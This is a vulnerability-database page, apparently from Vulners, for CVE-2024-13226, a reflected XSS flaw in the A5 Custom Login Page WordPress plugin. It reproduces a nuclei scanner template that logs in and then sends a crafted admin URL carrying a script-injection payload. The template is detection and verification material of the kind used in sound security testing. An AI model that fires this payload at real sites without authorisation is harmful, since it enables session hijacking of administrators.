Lucene search
K

A5 Custom Login Page - Reflected XSS

🗓️ 14 Jul 2026 07:07:24Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

A5 Custom Login Page WordPress plugin has a reflected XSS due to improper sanitization.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13226
31 Jan 202506:16
circl
CVE
CVE-2024-13226
31 Jan 202506:00
cve
Cvelist
CVE-2024-13226 A5 Custom Login Page <= 2.8.1 - Reflected XSS
31 Jan 202506:00
cvelist
EUVD
EUVD-2024-51445
3 Oct 202520:07
euvd
NVD
CVE-2024-13226
31 Jan 202506:15
nvd
OSV
CVE-2024-13226
31 Jan 202506:15
osv
Patchstack
WordPress A5 Custom Login Page plugin <= 2.8.1 - Reflected XSS vulnerability
31 Jan 202508:40
patchstack
Positive Technologies
PT-2025-2080
31 Jan 202500:00
ptsecurity
RedhatCVE
CVE-2024-13226
23 May 202507:10
redhatcve
Vulnrichment
CVE-2024-13226 A5 Custom Login Page <= 2.8.1 - Reflected XSS
31 Jan 202506:00
vulnrichment
Rows per page
id: CVE-2024-13226

info:
  name: A5 Custom Login Page - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    A5 Custom Login Page WordPress plugin v2.8.1 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires a crafted URL or input.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed or implement proper sanitization and escaping measures.
  reference:
    - https://wpscan.com/vulnerability/dd09fe99-2334-4d6f-8a70-e1cd856b1486/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13226
    cwe-id: CWE-79
    epss-score: 0.00577
    epss-percentile: 0.43539
    cpe: cpe:2.3:a:tepelstreel:a5_custom_login_page:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/plugins/custom-login-page/"
  tags: cve,cve2024,tepelstreel,custom-login-page,authenticated,wordpress,wp-plugin,wp,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=clp-settings&tab=testxss"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>","custom-login-page")
        condition: and
# digest: 4a0a0047304502210088369b9f7f586868aec6db95477fd5b9c2c5ad138159cbb351b73ad32ae7ac610220014823418bcd613c459f4ac6f25ad399d09de21d5673b6af4a659d8cf969c439:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2026 03:31Current
7High risk
Vulners AI Score7
CVSS 3.16.1
EPSS0.00577
SSVC
8